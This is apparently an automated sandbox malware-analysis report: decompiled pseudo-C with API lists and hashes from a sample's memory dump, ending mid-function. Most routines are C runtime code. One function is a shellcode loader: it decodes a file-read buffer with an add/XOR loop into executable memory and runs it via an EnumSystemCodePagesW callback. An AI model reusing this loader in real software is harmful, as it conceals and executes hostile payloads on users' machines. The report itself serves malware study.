6913->6914 6914->6901 6915->6910 6917 3b6f50 6916->6917 6918 3b6f65 6916->6918 6919 3b1c8f __dosmaperr 58 API calls 6917->6919 6921 3b1c8f __dosmaperr 58 API calls 6918->6921 6923 3b6f8a 6918->6923 6920 3b6f55 6919->6920 6922 3b1cc3 __setmbcp 58 API calls 6920->6922 6924 3b6f94 6921->6924 6926 3b6f5d 6922->6926 6923->6806 6925 3b1cc3 __setmbcp 58 API calls 6924->6925 6927 3b6f9c 6925->6927 6926->6806 6928 3b1e89 __wcsnicmp_l 9 API calls 6927->6928 6928->6926 6930 3b7e95 __write_nolock 6929->6930 6931 3b7ef3 6930->6931 6932 3b7ed4 6930->6932 6960 3b7ec9 6930->6960 6935 3b7f4b 6931->6935 6936 3b7f2f 6931->6936 6934 3b1c8f __dosmaperr 58 API calls 6932->6934 6933 3b5770 __cftoe_l 6 API calls 6937 3b86e9 6933->6937 6938 3b7ed9 6934->6938 6940 3b7f64 6935->6940 6943 3b7054 __lseeki64_nolock 60 API calls 6935->6943 6939 3b1c8f __dosmaperr 58 API calls 6936->6939 
6937->6848 6941 3b1cc3 __setmbcp 58 API calls 6938->6941 6942 3b7f34 6939->6942 6988 3b6c34 6940->6988 6944 3b7ee0 6941->6944 6946 3b1cc3 __setmbcp 58 API calls 6942->6946 6943->6940 6947 3b1e89 __wcsnicmp_l 9 API calls 6944->6947 6950 3b7f3b 6946->6950 6947->6960 6948 3b7f72 6949 3b82cb 6948->6949 6997 3b36db 6948->6997 6951 3b82e9 6949->6951 6952 3b865e WriteFile 6949->6952 6953 3b1e89 __wcsnicmp_l 9 API calls 6950->6953 6955 3b840d 6951->6955 6963 3b82ff 6951->6963 6956 3b82be GetLastError 6952->6956 6961 3b828b 6952->6961 6953->6960 6967 3b8418 6955->6967 6980 3b8502 6955->6980 6956->6961 6958 3b8697 6958->6960 6965 3b1cc3 __setmbcp 58 API calls 6958->6965 6959 3b7fdd 6959->6949 6962 3b7fed GetConsoleCP 6959->6962 6960->6933 6961->6958 6961->6960 6966 3b83eb 6961->6966 6962->6958 6986 3b801c 6962->6986 6963->6958 6963->6961 6964 3b836e WriteFile 6963->6964 6964->6956 6964->6963 6968 3b86c5 6965->6968 6969 3b868e 6966->6969 6970 3b83f6 6966->6970 6967->6958 6967->6961 6972 3b847d WriteFile 6967->6972 6973 3b1c8f __dosmaperr 58 API calls 6968->6973 6975 3b1ca2 __dosmaperr 58 API calls 6969->6975 6974 3b1cc3 __setmbcp 58 API calls 6970->6974 6971 3b8577 WideCharToMultiByte 6971->6956 6971->6980 6972->6956 6972->6967 6973->6960 6976 3b83fb 6974->6976 6975->6960 6978 3b1c8f __dosmaperr 58 API calls 6976->6978 6977 3b85c6 WriteFile 6977->6980 6981 3b8619 GetLastError 6977->6981 6978->6960 6980->6958 6980->6961 6980->6971 6980->6977 6981->6980 6982 3b92bb 60 API calls __write_nolock 6982->6986 6983 3b92d3 WriteConsoleW CreateFileW __putwch_nolock 6983->6986 6984 3b8105 WideCharToMultiByte 6984->6961 6985 3b8140 WriteFile 6984->6985 6985->6956 6985->6986 6986->6956 6986->6961 6986->6982 6986->6983 6986->6984 6987 3b819a WriteFile 6986->6987 7002 3b91b5 6986->7002 6987->6956 6987->6986 6989 3b6c3f 6988->6989 6990 3b6c4c 6988->6990 6991 3b1cc3 __setmbcp 58 API calls 6989->6991 6993 3b6c58 6990->6993 6994 3b1cc3 __setmbcp 58 API calls 6990->6994 6992 3b6c44 6991->6992 

                    Control-flow Graph

                    C-Code - Quality: 69%
                    			E003B12BC(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                    				char* _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				void* __ebx;
                    				void* __esi;
                    				signed int _t74;
                    				signed int _t78;
                    				char _t81;
                    				signed int _t86;
                    				signed int _t88;
                    				signed int _t91;
                    				signed int _t94;
                    				signed int _t97;
                    				signed int _t98;
                    				char* _t99;
                    				signed int _t100;
                    				signed int _t102;
                    				signed int _t103;
                    				signed int _t104;
                    				char* _t110;
                    				signed int _t113;
                    				signed int _t117;
                    				signed int _t119;
                    				void* _t120;
                    
                    				_t99 = _a4;
                    				_t74 = _a8;
                    				_v8 = _t99;
                    				_v12 = _t74;
                    				if(_a12 == 0) {
                    					L5:
                    					return 0;
                    				}
                    				_t97 = _a16;
                    				if(_t97 == 0) {
                    					goto L5;
                    				}
                    				if(_t99 != 0) {
                    					_t119 = _a20;
                    					__eflags = _t119;
                    					if(_t119 == 0) {
                    						L9:
                    						__eflags = _a8 - 0xffffffff;
                    						if(_a8 != 0xffffffff) {
                    							_t74 = E003B1530(_t99, 0, _a8);
                    							_t120 = _t120 + 0xc;
                    						}
                    						__eflags = _t119;
                    						if(_t119 == 0) {
                    							goto L3;
                    						} else {
                    							_t78 = _t74 | 0xffffffff;
                    							__eflags = _t97 - _t78 / _a12;
                    							if(_t97 > _t78 / _a12) {
                    								goto L3;
                    							}
                    							L13:
                    							_t117 = _a12 * _t97;
                    							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                    							_t98 = _t117;
                    							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                    								_t100 = 0x1000;
                    							} else {
                    								_t100 =  *(_t119 + 0x18);
                    							}
                    							_v16 = _t100;
                    							__eflags = _t117;
                    							if(_t117 == 0) {
                    								L41:
                    								return _a16;
                    							} else {
                    								do {
                    									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                    									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                    										L24:
                    										__eflags = _t98 - _t100;
                    										if(_t98 < _t100) {
                    											_t81 = E003B2752(_t98, _t119, _t119); // executed
                    											__eflags = _t81 - 0xffffffff;
                    											if(_t81 == 0xffffffff) {
                    												L46:
                    												return (_t117 - _t98) / _a12;
                    											}
                    											_t102 = _v12;
                    											__eflags = _t102;
                    											if(_t102 == 0) {
                    												L42:
                    												__eflags = _a8 - 0xffffffff;
                    												if(_a8 != 0xffffffff) {
                    													E003B1530(_a4, 0, _a8);
                    												}
                    												 *((intOrPtr*)(E003B1CC3())) = 0x22;
                    												L4:
                    												E003B1E89();
                    												goto L5;
                    											}
                    											_t110 = _v8;
                    											 *_t110 = _t81;
                    											_t98 = _t98 - 1;
                    											_v8 = _t110 + 1;
                    											_t103 = _t102 - 1;
                    											__eflags = _t103;
                    											_v12 = _t103;
                    											_t100 =  *(_t119 + 0x18);
                    											_v16 = _t100;
                    											goto L40;
                    										}
                    										__eflags = _t100;
                    										if(_t100 == 0) {
                    											_t86 = 0x7fffffff;
                    											__eflags = _t98 - 0x7fffffff;
                    											if(_t98 <= 0x7fffffff) {
                    												_t86 = _t98;
                    											}
                    										} else {
                    											__eflags = _t98 - 0x7fffffff;
                    											if(_t98 <= 0x7fffffff) {
                    												_t44 = _t98 % _t100;
                    												__eflags = _t44;
                    												_t113 = _t44;
                    												_t91 = _t98;
                    											} else {
                    												_t113 = 0x7fffffff % _t100;
                    												_t91 = 0x7fffffff;
                    											}
                    											_t86 = _t91 - _t113;
                    										}
                    										__eflags = _t86 - _v12;
                    										if(_t86 > _v12) {
                    											goto L42;
                    										} else {
                    											_push(_t86);
                    											_push(_v8);
                    											_push(E003B2873(_t119)); // executed
                    											_t88 = E003B2A2A(); // executed
                    											_t120 = _t120 + 0xc;
                    											__eflags = _t88;
                    											if(_t88 == 0) {
                    												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                    												goto L46;
                    											}
                    											__eflags = _t88 - 0xffffffff;
                    											if(_t88 == 0xffffffff) {
                    												L45:
                    												_t64 = _t119 + 0xc;
                    												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                    												__eflags =  *_t64;
                    												goto L46;
                    											}
                    											_t98 = _t98 - _t88;
                    											__eflags = _t98;
                    											L36:
                    											_v8 = _v8 + _t88;
                    											_v12 = _v12 - _t88;
                    											_t100 = _v16;
                    											goto L40;
                    										}
                    									}
                    									_t94 =  *(_t119 + 4);
                    									_v20 = _t94;
                    									__eflags = _t94;
                    									if(__eflags == 0) {
                    										goto L24;
                    									}
                    									if(__eflags < 0) {
                    										goto L45;
                    									}
                    									__eflags = _t98 - _t94;
                    									if(_t98 < _t94) {
                    										_t94 = _t98;
                    										_v20 = _t98;
                    									}
                    									_t104 = _v12;
                    									__eflags = _t94 - _t104;
                    									if(_t94 > _t104) {
                    										goto L42;
                    									} else {
                    										E003B2897(_v8, _t104,  *_t119, _t94);
                    										_t88 = _v20;
                    										_t120 = _t120 + 0x10;
                    										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                    										_t98 = _t98 - _t88;
                    										 *_t119 =  *_t119 + _t88;
                    										goto L36;
                    									}
                    									L40:
                    									__eflags = _t98;
                    								} while (_t98 != 0);
                    								goto L41;
                    							}
                    						}
                    					}
                    					_t74 = (_t74 | 0xffffffff) / _a12;
                    					__eflags = _t97 - _t74;
                    					if(_t97 <= _t74) {
                    						goto L13;
                    					}
                    					goto L9;
                    				}
                    				L3:
                    				 *((intOrPtr*)(E003B1CC3())) = 0x16;
                    				goto L4;
                    			}





























                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: 59fc80b96fffc72afd815ad67ce1625b61f32b5ac41ee5beda371c02a2359130
                    • Instruction ID: 60d99b197231ce0c934cab5f082d7614c7c2df8dd9c24c669e9a0f134f01371b
                    • Opcode Fuzzy Hash: 59fc80b96fffc72afd815ad67ce1625b61f32b5ac41ee5beda371c02a2359130
                    • Instruction Fuzzy Hash: F251DC34A00305DBDB268F69D8A06DE77F5AF41328FA48729FA29C6DD0E770DE509B40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E003B1000(void* __ecx, void* __eflags, intOrPtr _a12) {
                    				intOrPtr _v8;
                    				void* __ebx;
                    				void* __edi;
                    				intOrPtr _t6;
                    				void* _t7;
                    				_Unknown_base(*)()* _t8;
                    				void* _t20;
                    				_Unknown_base(*)()* _t21;
                    				void* _t26;
                    				void* _t27;
                    				void* _t28;
                    				intOrPtr* _t34;
                    
                    				_push(_t20);
                    				_t28 = 0; // executed
                    				_t6 = E003B114B(_t20, _t26, 0, 0x17d78400); // executed
                    				 *_t34 = 0x3c3000;
                    				_v8 = _t6;
                    				_t7 = E003B11DD(_a12, _t27); // executed
                    				_t8 = VirtualAlloc(0, 0x1466, 0x3000, 0x40); // executed
                    				_t21 = _t8;
                    				E003B1481(_t21, 0x1466, 1, _t7); // executed
                    				_t10 = _v8;
                    				if(_v8 != 0) {
                    					E003B1530(_t10, 0xcb, 0x17d78400);
                    					do {
                    						 *((char*)(_t21 + _t28)) = (( *((intOrPtr*)(_t21 + _t28)) + 0x0000006f ^ 0x00000059) + 0x0000000b ^ 0x00000054) - 0x17;
                    						_t28 = _t28 + 1;
                    					} while (_t28 < 0x1466);
                    					EnumSystemCodePagesW(_t21, 0); // executed
                    				}
                    				return 0;
                    			}
















                    APIs
                    • _malloc.LIBCMT ref: 003B100E
                      • Part of subcall function 003B114B: __FF_MSGBANNER.LIBCMT ref: 003B1162
                      • Part of subcall function 003B114B: __NMSG_WRITE.LIBCMT ref: 003B1169
                      • Part of subcall function 003B114B: RtlAllocateHeap.NTDLL(00870000,00000000,00000001,00000000,00000000,00000000,?,003B48C7,00000000,00000000,00000000,00000000,?,003B44F9,00000018,003C2280), ref: 003B118E
                      • Part of subcall function 003B11DD: __wfsopen.LIBCMT ref: 003B11E8
                    • VirtualAlloc.KERNELBASE(00000000,00001466,00003000,00000040), ref: 003B1036
                    • __fread_nolock.LIBCMT ref: 003B1048
                    • _memset.LIBCMT ref: 003B1062
                    • EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 003B1082
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: AllocAllocateCodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                    • String ID:
                    • API String ID: 3693343133-0
                    • Opcode ID: 37371f273f8dc7605030bbac49bd6b5808be28ce69042ed104c1ac73dbfc66fb
                    • Instruction ID: 2e38a4303b32ce40cae24b4c862d45957ad6e53e4632fe16628bc61f9f3e880a
                    • Opcode Fuzzy Hash: 37371f273f8dc7605030bbac49bd6b5808be28ce69042ed104c1ac73dbfc66fb
                    • Instruction Fuzzy Hash: E30147729053447BE722277A9C4BFDB3B5CCB52B5CF500425FB019A182E5E499029274
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 89%
                    			E003B149C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr _t16;
                    				intOrPtr _t19;
                    				intOrPtr _t29;
                    				void* _t32;
                    
                    				_push(0xc);
                    				_push(0x3c2170);
                    				E003B2400(__ebx, __edi, __esi);
                    				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
                    				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
                    					L6:
                    					_t16 = 0;
                    				} else {
                    					_t31 =  *((intOrPtr*)(_t32 + 0x18));
                    					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
                    						E003B1F5E(_t31);
                    						 *((intOrPtr*)(_t32 - 4)) = 0;
                    						_t19 = E003B12BC( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
                    						_t29 = _t19;
                    						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
                    						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
                    						E003B1525(_t31);
                    						_t16 = _t29;
                    					} else {
                    						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
                    							E003B1530( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
                    						}
                    						 *((intOrPtr*)(E003B1CC3())) = 0x16;
                    						E003B1E89();
                    						goto L6;
                    					}
                    				}
                    				return E003B2445(_t16);
                    			}








                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: 8c878f4f9c9f35adbf50a8d9e8ad9ebeee2bc4b1e957c72052971bc39ea182dc
                    • Instruction ID: 9d33451bf09b12cad72a9db07b987406fd7c6ff06fc7171f641f76b270850b1a
                    • Opcode Fuzzy Hash: 8c878f4f9c9f35adbf50a8d9e8ad9ebeee2bc4b1e957c72052971bc39ea182dc
                    • Instruction Fuzzy Hash: 93018432C00208ABCF33AFA69C119DF7B71AF81328F958215FA245E951D7718A21DF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 102 3b11dd-3b11f1 call 3b11f2
                    C-Code - Quality: 25%
                    			E003B11DD(intOrPtr _a4, intOrPtr _a8) {
                    				void* __ebp;
                    				void* _t3;
                    				void* _t4;
                    				void* _t5;
                    				void* _t6;
                    				void* _t9;
                    
                    				_push(0x40);
                    				_push(_a8);
                    				_push(_a4);
                    				_t3 = E003B11F2(_t4, _t5, _t6, _t9); // executed
                    				return _t3;
                    			}










                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: d40fe278819c9d050694ecddcc298a92bf324943cea261ed9c5f7f1d0bd8af15
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: FFB0927244020C77CE022E86EC02A893B1A9B50664F408020FB0C1C572E677E6609689
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E003B43CC(struct _EXCEPTION_POINTERS* _a4) {
                    
                    				SetUnhandledExceptionFilter(0);
                    				return UnhandledExceptionFilter(_a4);
                    			}



                    0x003b43d1
                    0x003b43e1

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,003B1E2A,?,?,?,00000000), ref: 003B43D1
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 003B43DA
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 08418ae5db77c559e0f84f281c482436e9388cf38eb12659eb179015562eca3c
                    • Instruction ID: 2a42186ae954fc9d999b17c08ebe5fa97ecb9dc2a8a6c5fdfe06364631d55fb1
                    • Opcode Fuzzy Hash: 08418ae5db77c559e0f84f281c482436e9388cf38eb12659eb179015562eca3c
                    • Instruction Fuzzy Hash: F8B09235044208ABCB022B9EEC0DB883F2CEB1475BF100510F70E440628B7254108A92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E003B439B(_Unknown_base(*)()* _a4) {
                    
                    				return SetUnhandledExceptionFilter(_a4);
                    			}



                    0x003b43a8

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?,?,003B3447,003B33FC), ref: 003B43A1
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 769703844c0e1a70e3235236ce1297fdf25ad1c011a3a0196850e33c7da7c855
                    • Instruction ID: 41ee425042cf93f0ec001a8972fe2df1406408a57c33c597c4a20f9d3d98810e
                    • Opcode Fuzzy Hash: 769703844c0e1a70e3235236ce1297fdf25ad1c011a3a0196850e33c7da7c855
                    • Instruction Fuzzy Hash: 51A0113000020CAB8A022B8AEC088883F2CEA002AAB000020FA0C000228B32A8208A82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E003B38A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t82;
                    				signed int _t86;
                    				long _t90;
                    				void* _t91;
                    				signed int _t94;
                    				signed int _t98;
                    				signed int _t99;
                    				signed char _t103;
                    				signed int _t105;
                    				intOrPtr _t106;
                    				intOrPtr* _t109;
                    				signed char _t111;
                    				long _t119;
                    				intOrPtr _t129;
                    				signed int _t133;
                    				void* _t135;
                    				signed int _t138;
                    				void** _t139;
                    				signed int _t141;
                    				signed int _t142;
                    				signed int _t143;
                    				signed int _t147;
                    				signed int _t149;
                    				void* _t150;
                    				signed int _t154;
                    				void* _t155;
                    				void* _t156;
                    
                    				_push(0x64);
                    				_push(0x3c2260);
                    				E003B2400(__ebx, __edi, __esi);
                    				E003B442F(0xb);
                    				 *((intOrPtr*)(_t155 - 4)) = 0;
                    				_push(0x40);
                    				_t141 = 0x20;
                    				_push(_t141);
                    				_t82 = E003B4869();
                    				_t133 = _t82;
                    				 *(_t155 - 0x24) = _t133;
                    				if(_t133 != 0) {
                    					 *0x3c4848 = _t82;
                    					 *0x3c50e4 = _t141;
                    					while(1) {
                    						__eflags = _t133 - 0x800 + _t82;
                    						if(_t133 >= 0x800 + _t82) {
                    							break;
                    						}
                    						 *((short*)(_t133 + 4)) = 0xa00;
                    						 *_t133 =  *_t133 | 0xffffffff;
                    						 *((intOrPtr*)(_t133 + 8)) = 0;
                    						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
                    						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
                    						 *((short*)(_t133 + 0x25)) = 0xa0a;
                    						 *((intOrPtr*)(_t133 + 0x38)) = 0;
                    						 *((char*)(_t133 + 0x34)) = 0;
                    						_t133 = _t133 + 0x40;
                    						 *(_t155 - 0x24) = _t133;
                    						_t82 =  *0x3c4848; // 0x8963c8
                    					}
                    					GetStartupInfoW(_t155 - 0x74);
                    					__eflags =  *((short*)(_t155 - 0x42));
                    					if( *((short*)(_t155 - 0x42)) == 0) {
                    						L27:
                    						_t129 = 0xfffffffe;
                    						L28:
                    						_t142 = 0;
                    						__eflags = 0;
                    						while(1) {
                    							 *(_t155 - 0x2c) = _t142;
                    							__eflags = _t142 - 3;
                    							if(_t142 >= 3) {
                    								break;
                    							}
                    							_t147 = (_t142 << 6) +  *0x3c4848;
                    							 *(_t155 - 0x24) = _t147;
                    							__eflags =  *_t147 - 0xffffffff;
                    							if( *_t147 == 0xffffffff) {
                    								L33:
                    								 *(_t147 + 4) = 0x81;
                    								__eflags = _t142;
                    								if(_t142 != 0) {
                    									_t65 = _t142 - 1; // -1
                    									asm("sbb eax, eax");
                    									_t90 =  ~_t65 + 0xfffffff5;
                    									__eflags = _t90;
                    								} else {
                    									_t90 = 0xfffffff6;
                    								}
                    								_t91 = GetStdHandle(_t90);
                    								 *(_t155 - 0x1c) = _t91;
                    								__eflags = _t91 - 0xffffffff;
                    								if(_t91 == 0xffffffff) {
                    									L45:
                    									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
                    									 *_t147 = _t129;
                    									_t94 =  *0x3c6100;
                    									__eflags = _t94;
                    									if(_t94 != 0) {
                    										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
                    									}
                    									goto L47;
                    								} else {
                    									__eflags = _t91;
                    									if(_t91 == 0) {
                    										goto L45;
                    									}
                    									_t98 = GetFileType(_t91);
                    									__eflags = _t98;
                    									if(_t98 == 0) {
                    										goto L45;
                    									}
                    									 *_t147 =  *(_t155 - 0x1c);
                    									_t99 = _t98 & 0x000000ff;
                    									__eflags = _t99 - 2;
                    									if(_t99 != 2) {
                    										__eflags = _t99 - 3;
                    										if(_t99 != 3) {
                    											L44:
                    											_t71 = _t147 + 0xc; // -3950652
                    											E003B40A2(_t71, 0xfa0, 0);
                    											_t156 = _t156 + 0xc;
                    											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
                    											L47:
                    											_t142 = _t142 + 1;
                    											continue;
                    										}
                    										_t103 =  *(_t147 + 4) | 0x00000008;
                    										__eflags = _t103;
                    										L43:
                    										 *(_t147 + 4) = _t103;
                    										goto L44;
                    									}
                    									_t103 =  *(_t147 + 4) | 0x00000040;
                    									goto L43;
                    								}
                    							}
                    							__eflags =  *_t147 - _t129;
                    							if( *_t147 == _t129) {
                    								goto L33;
                    							}
                    							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
                    							goto L47;
                    						}
                    						 *((intOrPtr*)(_t155 - 4)) = _t129;
                    						E003B3B53();
                    						_t86 = 0;
                    						__eflags = 0;
                    						L49:
                    						return E003B2445(_t86);
                    					}
                    					_t105 =  *(_t155 - 0x40);
                    					__eflags = _t105;
                    					if(_t105 == 0) {
                    						goto L27;
                    					}
                    					_t135 =  *_t105;
                    					 *(_t155 - 0x1c) = _t135;
                    					_t106 = _t105 + 4;
                    					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                    					 *(_t155 - 0x20) = _t106 + _t135;
                    					__eflags = _t135 - 0x800;
                    					if(_t135 >= 0x800) {
                    						_t135 = 0x800;
                    						 *(_t155 - 0x1c) = 0x800;
                    					}
                    					_t149 = 1;
                    					__eflags = 1;
                    					 *(_t155 - 0x30) = 1;
                    					while(1) {
                    						__eflags =  *0x3c50e4 - _t135; // 0x20
                    						if(__eflags >= 0) {
                    							break;
                    						}
                    						_t138 = E003B4869(_t141, 0x40);
                    						 *(_t155 - 0x24) = _t138;
                    						__eflags = _t138;
                    						if(_t138 != 0) {
                    							0x3c4848[_t149] = _t138;
                    							 *0x3c50e4 =  *0x3c50e4 + _t141;
                    							__eflags =  *0x3c50e4;
                    							while(1) {
                    								__eflags = _t138 - 0x800 + 0x3c4848[_t149];
                    								if(_t138 >= 0x800 + 0x3c4848[_t149]) {
                    									break;
                    								}
                    								 *((short*)(_t138 + 4)) = 0xa00;
                    								 *_t138 =  *_t138 | 0xffffffff;
                    								 *((intOrPtr*)(_t138 + 8)) = 0;
                    								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                    								 *((short*)(_t138 + 0x25)) = 0xa0a;
                    								 *((intOrPtr*)(_t138 + 0x38)) = 0;
                    								 *((char*)(_t138 + 0x34)) = 0;
                    								_t138 = _t138 + 0x40;
                    								 *(_t155 - 0x24) = _t138;
                    							}
                    							_t149 = _t149 + 1;
                    							 *(_t155 - 0x30) = _t149;
                    							_t135 =  *(_t155 - 0x1c);
                    							continue;
                    						}
                    						_t135 =  *0x3c50e4; // 0x20
                    						 *(_t155 - 0x1c) = _t135;
                    						break;
                    					}
                    					_t143 = 0;
                    					 *(_t155 - 0x2c) = 0;
                    					_t129 = 0xfffffffe;
                    					_t109 =  *((intOrPtr*)(_t155 - 0x28));
                    					_t139 =  *(_t155 - 0x20);
                    					while(1) {
                    						__eflags = _t143 - _t135;
                    						if(_t143 >= _t135) {
                    							goto L28;
                    						}
                    						_t150 =  *_t139;
                    						__eflags = _t150 - 0xffffffff;
                    						if(_t150 == 0xffffffff) {
                    							L22:
                    							_t143 = _t143 + 1;
                    							 *(_t155 - 0x2c) = _t143;
                    							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                    							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                    							_t139 =  &(_t139[1]);
                    							 *(_t155 - 0x20) = _t139;
                    							continue;
                    						}
                    						__eflags = _t150 - _t129;
                    						if(_t150 == _t129) {
                    							goto L22;
                    						}
                    						_t111 =  *_t109;
                    						__eflags = _t111 & 0x00000001;
                    						if((_t111 & 0x00000001) == 0) {
                    							goto L22;
                    						}
                    						__eflags = _t111 & 0x00000008;
                    						if((_t111 & 0x00000008) != 0) {
                    							L20:
                    							_t154 = ((_t143 & 0x0000001f) << 6) + 0x3c4848[_t143 >> 5];
                    							 *(_t155 - 0x24) = _t154;
                    							 *_t154 =  *_t139;
